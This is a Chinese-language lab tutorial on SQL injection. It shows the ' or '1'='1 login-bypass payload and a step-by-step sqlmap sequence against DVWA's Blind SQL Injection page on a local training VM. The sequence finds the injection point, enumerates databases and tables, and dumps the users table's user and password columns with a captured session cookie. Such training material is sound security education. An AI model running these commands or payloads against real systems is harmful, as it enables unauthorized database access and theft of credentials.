目录
4.kali中登陆dvwa(用户名和密码都是 admin),进入 SQL Injection(Blind)页面,安全等级调为low
2.随意输入一个数字,如将ID输入为:1,然后单击“提交”。在浏览器地址栏复制URL
前言:
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。
数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进行不受限的访问。
这个语句简单地指明了从user的表中查询用户名和username相等的,并且密码和password相等的。所以,如果用户发送用户名为”admin”,并且密码为”admin”,那么SQL语句被创建如下:
SELECT * FROM user WHERE username='admin' AND password ='admin'
那么,如果用户输入’ or ‘1’=’1,第一个引号会终止输入的字符串,剩下的会被当做SQL语句,并且在SQL语句中1=1恒为真,这就能够绕过注册机制。
SELECT * FROM user WHERE username='admin' AND password =''or '1'='1'。
1 环境准备
1.开启OWASP靶机和Kali虚拟机
2.打开火狐浏览器,输入靶机的ip
3.进入靶场,点击Damn选项
4.kali中登陆dvwa(用户名和密码都是 admin),进入 SQL Injection(Blind)页面,安全等级调为low
2 利用SQLmap实现 SQL 注入案例
1.点击SQL injection(Bind)选项
2.随意输入一个数字,如将ID输入为:1,然后单击“提交”。在浏览器地址栏复制URL
3.F12打开开发者工具
选中Storage(存储)选项卡,找到cookies,复制其中的PHPSESSID的值(获取cookies,为之后绕过登录页面做准备)
4.由于浏览器提交方式为get型
sqlmap采用-u命令。将刚才复制的URL和COOKIE写入命令:
sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch
(使用sqlmap进行get型注入,cookie用来绕过登录页面)
可以获取到注入点:
5.为了查看有哪些数据库
发现两个数据库,dvwa和information_schema
输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch --dbs
6.为了查看有当前数据库
输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch --current-db
7.为了查看数据库中所有的表
输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa --tables
8.为了查看users表中有哪些列
输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa -T users --columns
9.爆破表中user和password这两列
sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa -T users -C"user,password" --dump